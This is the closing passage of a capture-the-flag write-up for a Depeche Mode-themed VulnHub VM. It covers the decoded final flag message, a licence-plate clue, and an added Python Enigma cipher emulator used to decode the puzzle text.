Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1450x1450
Megapixels                      : 2.1
Create Date                     : 1990:03:19 22:13:30.04
Date/Time Original              : 1990:03:19 22:13:30.04

I was unable to get the Minarke program to work, but the following decoder decoded the text for me. I just had to fix up the spacing to fully read the message.

ONE FINAL CHALLENGE FOR YOU BGHX 

CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR 
ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING  THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES 
ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR 

SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN 

KNIGHTMARE

An update on knightmare’s Twitter here tells us that the final message should read BGH 393X. A little research leads us to this message board, which tells us that this is the license plate of a 1981 Ford Cortina MkV in the music video for the Depeche Mode song ‘Useless’.
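The faith_and_devotion hint fixes reflector B, initial positions A B C, ring settings C B A and plugboard pairs A-B and C-D, but it never says which three rotors sit in the machine, which is part of why an online decoder is the path of least resistance. As an added example (not the page’s code and not Minarke) here is a compact Wehrmacht three-rotor Enigma emulator in Python with the standard rotor I-V and reflector B/C wirings, including the middle-rotor double step. It is checked against the well-known test vector (rotors I II III, reflector B, everything at A, “AAAAA” encrypts to “BDZGO”) and against the machine’s self-reciprocity. The helper from_hint_file, its name and its default rotor order I, II, III are my assumptions; the page does not name the rotors, so the ciphertext in the Copyright field above is not asserted here and the rotor order is a parameter the reader can vary.

```python
# Standard published wirings for the Enigma I rotors (wiring, turnover notch) and reflectors.
ROTORS = {
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
    "IV":  ("ESOVPZJAYQUIRHXLNFTGKDCMWB", "J"),
    "V":   ("VZBRGITYUPSDNHLXAWMJQOFECK", "Z"),
}
REFLECTORS = {
    "B": "YRUHQSLDPXNGOKMIEBFZCWVJAT",
    "C": "FVPJIAOYEDRZXWGCTKUQSBNMHL",
}


def _idx(ch):
    return ord(ch) - ord("A")


class Rotor:
    """One rotor with its ring setting (Ringstellung) and current window position."""

    def __init__(self, name, ring, position):
        wiring, notch = ROTORS[name]
        self.fwd = [_idx(c) for c in wiring]       # right-to-left pass
        self.bwd = [0] * 26                         # inverse wiring, left-to-right pass
        for i, out in enumerate(self.fwd):
            self.bwd[out] = i
        self.notch = _idx(notch)
        self.ring = _idx(ring)
        self.pos = _idx(position)

    def at_notch(self):
        return self.pos == self.notch

    def step(self):
        self.pos = (self.pos + 1) % 26

    def _map(self, table, c):
        off = (self.pos - self.ring) % 26          # signal enters offset by position - ring
        return (table[(c + off) % 26] - off) % 26

    def forward(self, c):
        return self._map(self.fwd, c)

    def backward(self, c):
        return self._map(self.bwd, c)


class Enigma:
    def __init__(self, rotors, reflector, rings, positions, plugboard=()):
        # rotors, rings and positions are listed left to right, as on the machine
        self.rotors = [Rotor(n, r, p) for n, r, p in zip(rotors, rings, positions)]
        self.reflector = [_idx(c) for c in REFLECTORS[reflector]]
        self.plug = list(range(26))
        for a, b in plugboard:                      # pairs such as ("AB", "CD")
            self.plug[_idx(a)], self.plug[_idx(b)] = _idx(b), _idx(a)

    def _step(self):
        # Rotors advance before the contact closes; a middle rotor sitting on its
        # notch carries the left rotor and itself (the famous double step).
        left, mid, right = self.rotors
        if mid.at_notch():
            left.step()
            mid.step()
        elif right.at_notch():
            mid.step()
        right.step()

    def _key(self, c):
        self._step()
        c = self.plug[c]
        for r in reversed(self.rotors):             # right rotor first
            c = r.forward(c)
        c = self.reflector[c]
        for r in self.rotors:                       # back out, left rotor first
            c = r.backward(c)
        return self.plug[c]

    def process(self, text):
        """Encrypt or decrypt (same operation); characters outside A-Z are dropped."""
        out = []
        for ch in text.upper():
            if "A" <= ch <= "Z":
                out.append(chr(self._key(_idx(ch)) + ord("A")))
        return "".join(out)


def from_hint_file(rotor_order=("I", "II", "III")):
    """Machine set up per faith_and_devotion: reflector B, positions A B C,
    ring settings C B A, plugboard A-B and C-D. The hint does not name the
    rotors, so rotor_order is an ASSUMPTION of this example, not the page's."""
    return Enigma(rotor_order, "B", rings=("C", "B", "A"),
                  positions=("A", "B", "C"), plugboard=("AB", "CD"))


if __name__ == "__main__":
    print(Enigma(("I", "II", "III"), "B", "AAA", "AAA").process("AAAAA"))  # BDZGO
```

Two properties are worth noticing because they are what made the real machine breakable: processing is its own inverse (the same settings decrypt what they encrypted), and the reflector guarantees that no letter ever encrypts to itself, which is exactly the constraint crib-based attacks at Bletchley Park leaned on. To try the page’s ciphertext, pass the Copyright string from the exiftool output to from_hint_file(order).process() for each candidate rotor order.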


Overall this was a fun VM with plenty of twists and turns. I learned some new techniques and a bit about the band Depeche Mode. Thank you knightmare for the challenge and for sharing a bit of culture with us.

As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.

Until next time, enjoy the music!